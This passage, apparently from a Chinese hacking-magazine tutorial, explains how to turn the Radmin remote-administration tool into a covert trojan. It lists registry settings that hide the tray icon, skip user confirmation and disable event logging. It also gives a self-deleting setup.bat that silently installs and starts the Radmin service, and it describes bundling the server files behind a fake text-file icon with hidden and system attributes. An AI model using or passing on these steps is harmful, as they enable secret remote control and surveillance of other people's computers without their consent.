将Radmin改造为百分百木马

"FilterIp"=hex:00,00,00,00

"DisableTrayIcon"=hex:01,00,00,00(01表示隐藏系统右下角的图标,如改成00图标就会被显示)

"AutoAllow"=hex:00,00,00,00

"AskUser"=hex:00,00,00,00

"EnableEventLog"=hex:00,00,00,00

5.最后Cytkk麻利地在桌面新建了一个setup.bat批处理文件，在里面添加如下脚本：

@echo off

***********************（自动安装Radmin服务端）

regedit.exe -s %SystemRoot%system32 _server.reg >nul （自动将r_server.reg内的配置信息导入目标机注册表）

net start r_server >nul （启动r_server服务端服务）

*******************************（删除信息文件）

del %0

注意：文中代码后括号内的内容为注释，勿输入。

超级捆绑

由于Radmin并不是“木马型”监控软件，所以它的服务端是由r_server.exe、raddrv.dll、AdmDll.dll三个文件组成，而一般的“木马”服务端通常只有一个可执行文件。这是个比较麻烦的硬伤，但这难不倒Cytkk，他熟练地运行了一款名为“超级捆绑”的软件。

1.在界面点击右边白色图标，将Radmin服务端的三个文件添加进文件列表，捆绑方式设置成“按文件捆绑方式”，然后点击右边的“高级”按钮进入详细设置，在“常规”选项内（图2），将图标自定义为一个文本文件以增加更好的隐蔽性，文件大小则采用默认。

2．随后，Cytkk又将“属性”中的“只读”、“隐藏”和“系统”三项全部选中，这样就使捆绑后的文件更具隐蔽和安全性。